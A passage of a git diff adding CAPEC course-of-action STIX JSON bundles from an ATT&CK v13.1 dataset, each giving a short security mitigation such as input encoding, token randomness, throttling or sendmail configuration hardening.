b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--08e36a84-cc88-49b9-81f6-7dab06d12023.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--78cca3d4-d995-4f09-9e57-ffe48168940d", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use synchronization to control the flow of execution.", + "id": "course-of-action--08e36a84-cc88-49b9-81f6-7dab06d12023", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-26-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--08eae113-ec2a-445c-afca-ffe3b526e605.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--08eae113-ec2a-445c-afca-ffe3b526e605.json new file mode 100644 index 0000000000000000000000000000000000000000..b4d2c954b58d5fb4693d4e55a399c2b54841413f --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--08eae113-ec2a-445c-afca-ffe3b526e605.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--eac634e9-30f5-43da-b64b-ecab213e8dcc", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Make sure that all session tokens use a good source of randomness", + "id": "course-of-action--08eae113-ec2a-445c-afca-ffe3b526e605", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-39-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--094a4c09-e49c-422b-b8ec-b51c19dba18c.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--094a4c09-e49c-422b-b8ec-b51c19dba18c.json new file mode 100644 index 0000000000000000000000000000000000000000..6178d133a59983b3898cc409d8f42ec0e461598f --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--094a4c09-e49c-422b-b8ec-b51c19dba18c.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--d5ac5f7c-95ac-4efe-a90a-f0dd4ba0da04", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Use browser technologies that do not allow client side scripting.", + "id": "course-of-action--094a4c09-e49c-422b-b8ec-b51c19dba18c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-199-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--098aadf6-648b-4c3a-bbf9-224e6bd430fd.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--098aadf6-648b-4c3a-bbf9-224e6bd430fd.json new file mode 100644 index 0000000000000000000000000000000000000000..d88aa3821d0582f539580987aa971344c10f5d05 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--098aadf6-648b-4c3a-bbf9-224e6bd430fd.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--a57e2b26-78bb-44c3-8c0e-38848714b8d7", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Build throttling mechanism into the resource allocation. Provide for a timeout mechanism for allocated resources whose transaction does not complete within a specified interval.", + "id": "course-of-action--098aadf6-648b-4c3a-bbf9-224e6bd430fd", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-147-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0a399b26-688b-4a78-8d74-4d815dbc37ad.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0a399b26-688b-4a78-8d74-4d815dbc37ad.json new file mode 100644 index 0000000000000000000000000000000000000000..e9e615128fb4659368a2cc42c1faafed2321ec14 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0a399b26-688b-4a78-8d74-4d815dbc37ad.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--18b4a8f7-7f86-45ff-9014-80662f4b5211", + "objects": [ + { + "created": "2017-01-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Include \"hosts file\"/IP address in the application", + "id": "course-of-action--0a399b26-688b-4a78-8d74-4d815dbc37ad", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-598-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0a42ee9c-7f1e-494d-9924-1d1d6accfbe6.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0a42ee9c-7f1e-494d-9924-1d1d6accfbe6.json new file mode 100644 index 0000000000000000000000000000000000000000..fd5ec91e3dc495418293c1b566533795fa47d1d0 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0a42ee9c-7f1e-494d-9924-1d1d6accfbe6.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--53d02dd2-b888-4836-86b5-0338308dac75", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure all content that is delivered to client is sanitized against an acceptable content specification.", + "id": "course-of-action--0a42ee9c-7f1e-494d-9924-1d1d6accfbe6", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-19-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0a849fd5-2365-44ad-b7db-fd394c0d1ec7.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0a849fd5-2365-44ad-b7db-fd394c0d1ec7.json new file mode 100644 index 0000000000000000000000000000000000000000..64698e11c0305c2d1da7f6ccc6f33be6b731af06 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0a849fd5-2365-44ad-b7db-fd394c0d1ec7.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--bf85ae56-a66f-4ceb-b11b-ef536f83a50a", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Input should be encoded prior to use in commands to make sure command related characters are not treated as part of the command. For example, quotation characters may need to be encoded so that the application does not treat the quotation as a delimiter.", + "id": "course-of-action--0a849fd5-2365-44ad-b7db-fd394c0d1ec7", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-248-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0b18ed90-3e15-4da1-8a4a-dab1030a5dc4.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0b18ed90-3e15-4da1-8a4a-dab1030a5dc4.json new file mode 100644 index 0000000000000000000000000000000000000000..1c3ec2743121dccc0023fc684214f73155404904 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0b18ed90-3e15-4da1-8a4a-dab1030a5dc4.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--4b5130a4-29a0-4237-82c0-14a543821ef4", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Normalize, filter and use an allowlist for any input that will be included in any subsequent web pages or back end operations.", + "id": "course-of-action--0b18ed90-3e15-4da1-8a4a-dab1030a5dc4", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-247-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0b60f2ad-a597-4f6d-8433-af47d2743270.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0b60f2ad-a597-4f6d-8433-af47d2743270.json new file mode 100644 index 0000000000000000000000000000000000000000..f8d2dff6ed4cc302f27e967192e30a116f8d1bab --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0b60f2ad-a597-4f6d-8433-af47d2743270.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--e52a49e1-04cb-4c6e-a2e4-5732d0f7cd53", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Conduct detailed vendor assessment before acquiring COTS hardware.", + "id": "course-of-action--0b60f2ad-a597-4f6d-8433-af47d2743270", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-671-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0ba5f98c-6878-4132-908b-4b27bd6e56c3.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0ba5f98c-6878-4132-908b-4b27bd6e56c3.json new file mode 100644 index 0000000000000000000000000000000000000000..f4e9c196d2825a5cb62fff36439ce449bb496f8f --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0ba5f98c-6878-4132-908b-4b27bd6e56c3.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--8031045c-7cca-47a5-982b-5e21b49e8f21", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Educate designers, developers, engineers, etc. on social engineering attacks to avoid downloading malicious software via attacks such as phishing attacks", + "id": "course-of-action--0ba5f98c-6878-4132-908b-4b27bd6e56c3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-537-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0bb278f4-3628-416a-8686-c55572ab5d65.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0bb278f4-3628-416a-8686-c55572ab5d65.json new file mode 100644 index 0000000000000000000000000000000000000000..ddee91b2d4b8473bbf3b101ded32fe5677481e14 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0bb278f4-3628-416a-8686-c55572ab5d65.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--2155711c-a0f6-4a9f-95fc-5e660d165e5f", + "objects": [ + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Port Security and DHCP snooping", + "id": "course-of-action--0bb278f4-3628-416a-8686-c55572ab5d65", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-697-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0bc589af-7ac3-4771-b1db-defb88ba61b5.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0bc589af-7ac3-4771-b1db-defb88ba61b5.json new file mode 100644 index 0000000000000000000000000000000000000000..0403d7be4ac4ecc38b30951ad722f0003eb3141d --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0bc589af-7ac3-4771-b1db-defb88ba61b5.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--7b9716b8-1a78-4b27-9fb2-d87f6738117a", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: back-end HTTP agents reject ambiguous requests and close the network connection.", + "id": "course-of-action--0bc589af-7ac3-4771-b1db-defb88ba61b5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-105-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0c139321-7054-4d7b-92ff-f021b5ce6fc0.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0c139321-7054-4d7b-92ff-f021b5ce6fc0.json new file mode 100644 index 0000000000000000000000000000000000000000..49719488b11658754cabebb81cf1d973c9c90ae9 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0c139321-7054-4d7b-92ff-f021b5ce6fc0.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--e901f6ac-f9ac-4805-b363-29287a9b2715", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The use of HMAC to hash the response from the server can also be used to thwart reflection. The server responds by returning its own challenge as well as hashing the client's challenge, its own challenge and the pre-shared secret. Requiring the client to respond with the HMAC of the two challenges ensures that only the possessor of a valid pre-shared secret can successfully hash in the two values.", + "id": "course-of-action--0c139321-7054-4d7b-92ff-f021b5ce6fc0", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-90-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0c769b9e-b3fa-410a-b87b-ef79448b95b2.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0c769b9e-b3fa-410a-b87b-ef79448b95b2.json new file mode 100644 index 0000000000000000000000000000000000000000..217b9adfef67f3c86844a89375c8f8d7caf1527f --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0c769b9e-b3fa-410a-b87b-ef79448b95b2.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--9eab0c73-0144-46eb-a69a-bb756a3d7657", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "To mitigate this type of an attack, explicit intents should be used whenever sensitive data is being sent. An explicit intent is delivered to a specific application as declared within the intent, whereas the Android operating system determines who receives an implicit intent which could potentially be a malicious application. If an implicit intent must be used, then it should be assumed that the intent will be received by an unknown application and any response should be treated accordingly. Implicit intents should never be used for inter-application communication.", + "id": "course-of-action--0c769b9e-b3fa-410a-b87b-ef79448b95b2", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-499-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0cf8b19c-92c1-410d-bd1f-e7474d2878a0.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0cf8b19c-92c1-410d-bd1f-e7474d2878a0.json new file mode 100644 index 0000000000000000000000000000000000000000..ac1ab3fec29b5779e27f27056234e05843d489cb --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0cf8b19c-92c1-410d-bd1f-e7474d2878a0.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--e4acd3ed-c9d8-44ed-97eb-730d37273a5d", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not download software from untrusted sources", + "id": "course-of-action--0cf8b19c-92c1-410d-bd1f-e7474d2878a0", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-537-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.7" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0d0e8c85-a2de-43ee-aa5a-3fb5d75c14c8.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0d0e8c85-a2de-43ee-aa5a-3fb5d75c14c8.json new file mode 100644 index 0000000000000000000000000000000000000000..68c894f5fec08a7c12e1c6616dcaf0fe9309ef67 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0d0e8c85-a2de-43ee-aa5a-3fb5d75c14c8.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--08544a69-aa10-4c4a-9032-72c627970801", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n Disable the 7 to 8 bit conversion. This can be done by removing the F=9 flag from all Mailer specifications in the sendmail.cf file.\n For example, a sendmail.cf file with these changes applied should look similar to (depending on your system and configuration):\n Mlocal, P=/usr/libexec/mail.local, F=lsDFMAw5:/|@qrmn, S=10/30, R=20/40,T=DNS/RFC822/X-Unix,A=mail -d $u\n Mprog, P=/bin/sh, F=lsDFMoqeu, S=10/30, R=20/40,D=$z:/,T=X-Unix,A=sh -c $u\n \n This can be achieved for the \"Mlocal\" and \"Mprog\" Mailers by modifying the \".mc\" file to include the following lines:\n define(`LOCAL_MAILER_FLAGS',ifdef(`LOCAL_MAILER_FLAGS',`translit(LOCAL_MAILER_FLAGS, `9')',`rmn'))\n \n define(`LOCAL_SHELL_FLAGS',ifdef(`LOCAL_SHELL_FLAGS',`translit(LOCAL_SHELL_FLAGS, `9')',`eu'))\n \n \n and then rebuilding the sendmail.cf file using m4(1).\n From \"Exploiting Software\", please see reference below.\n ", + "id": "course-of-action--0d0e8c85-a2de-43ee-aa5a-3fb5d75c14c8", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-42-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.7" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0d393965-6ce2-4c90-8900-0e83b807d807.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0d393965-6ce2-4c90-8900-0e83b807d807.json new file mode 100644 index 0000000000000000000000000000000000000000..cc5b49ca3414b83ebfcddfbe89fe8ef9aed1c794 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0d393965-6ce2-4c90-8900-0e83b807d807.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--dcac53fd-fed4-488c-8a4d-134e8a3cfc53", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Generate and validate MAC for cookies", + "id": "course-of-action--0d393965-6ce2-4c90-8900-0e83b807d807", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-31-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0d8de0b8-e9fd-44b2-8f1f-f8aae79949be.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0d8de0b8-e9fd-44b2-8f1f-f8aae79949be.json new file mode 100644 index 0000000000000000000000000000000000000000..161ac044b93f26de3ef2e820a8b7f1c9d9eda2f2 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0d8de0b8-e9fd-44b2-8f1f-f8aae79949be.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--45910ef6-bbf6-4c18-80f7-f344c968fad7", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n In a J2EE setting, administrators can associate a role that is impossible for the authenticator to grant users, such as \"NoAccess\", with all Servlets to which access is guarded by a limited number of servlets visible to, and accessible by, the user.\n Having done so, any direct access to those protected Servlets will be prohibited by the web container.\n In a more general setting, the administrator must mark every resource besides the ones supposed to be exposed to the user as accessible by a role impossible for the user to assume. The default security setting must be to deny access and then grant access only to those resources intended by business logic.\n ", + "id": "course-of-action--0d8de0b8-e9fd-44b2-8f1f-f8aae79949be", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-1-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0deacbb8-6bed-42d8-843e-2f7ae16d93a7.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0deacbb8-6bed-42d8-843e-2f7ae16d93a7.json new file mode 100644 index 0000000000000000000000000000000000000000..0f60ee2e89bfcb9768c383144b20bffaf7821248 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0deacbb8-6bed-42d8-843e-2f7ae16d93a7.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--6a99dd05-6d85-42e4-9bd0-1406b61d1a92", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure good compartmentalization in the system to provide protected areas that can be trusted.", + "id": "course-of-action--0deacbb8-6bed-42d8-843e-2f7ae16d93a7", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-27-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0dfabd41-428e-43f9-93f8-078e6987d31c.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0dfabd41-428e-43f9-93f8-078e6987d31c.json new file mode 100644 index 0000000000000000000000000000000000000000..77104f6477974703adc4f905c4bc2f3079c91b71 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0dfabd41-428e-43f9-93f8-078e6987d31c.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--239ca0ba-7bbe-49df-92fc-2f8a1175509e", + "objects": [ + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Patch installed applications as soon as new updates become available.", + "id": "course-of-action--0dfabd41-428e-43f9-93f8-078e6987d31c", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-634-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0dfd5de3-6691-47d2-abfd-21299e9f040b.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0dfd5de3-6691-47d2-abfd-21299e9f040b.json new file mode 100644 index 0000000000000000000000000000000000000000..95616920c9f96e6bfb01f287363be8e71b259a3f --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0dfd5de3-6691-47d2-abfd-21299e9f040b.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--1ac6507c-df65-4594-90c7-b6ff2930866f", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not expose environment variable to the user.", + "id": "course-of-action--0dfd5de3-6691-47d2-abfd-21299e9f040b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-10-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0f461277-141d-4b7f-8f50-ce7f5ee71f4c.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0f461277-141d-4b7f-8f50-ce7f5ee71f4c.json new file mode 100644 index 0000000000000000000000000000000000000000..8f2956c22366adfa0320f20c8db4f837f65917af --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0f461277-141d-4b7f-8f50-ce7f5ee71f4c.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--0c03a687-c66f-458a-9301-80f2bfb3f660", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Hide cookie's software information filed.", + "id": "course-of-action--0f461277-141d-4b7f-8f50-ce7f5ee71f4c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-170-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0f8223ee-d815-41b0-8f0f-a9b23de56d8b.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0f8223ee-d815-41b0-8f0f-a9b23de56d8b.json new file mode 100644 index 0000000000000000000000000000000000000000..ac0d1cf574ddc084397f7cd1f4971e975d6dea57 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0f8223ee-d815-41b0-8f0f-a9b23de56d8b.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--8a06e919-3fc3-42ac-b1c6-238a7986f7b6", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Carefully control access to physical log files.", + "id": "course-of-action--0f8223ee-d815-41b0-8f0f-a9b23de56d8b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-93-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0f87d25c-d219-4247-a96c-10364d611d0b.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0f87d25c-d219-4247-a96c-10364d611d0b.json new file mode 100644 index 0000000000000000000000000000000000000000..e4a8aaa01662b87173ba19162cdc437b6f24a174 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0f87d25c-d219-4247-a96c-10364d611d0b.json @@ -0,0 +1,20 @@ +{ + "id": 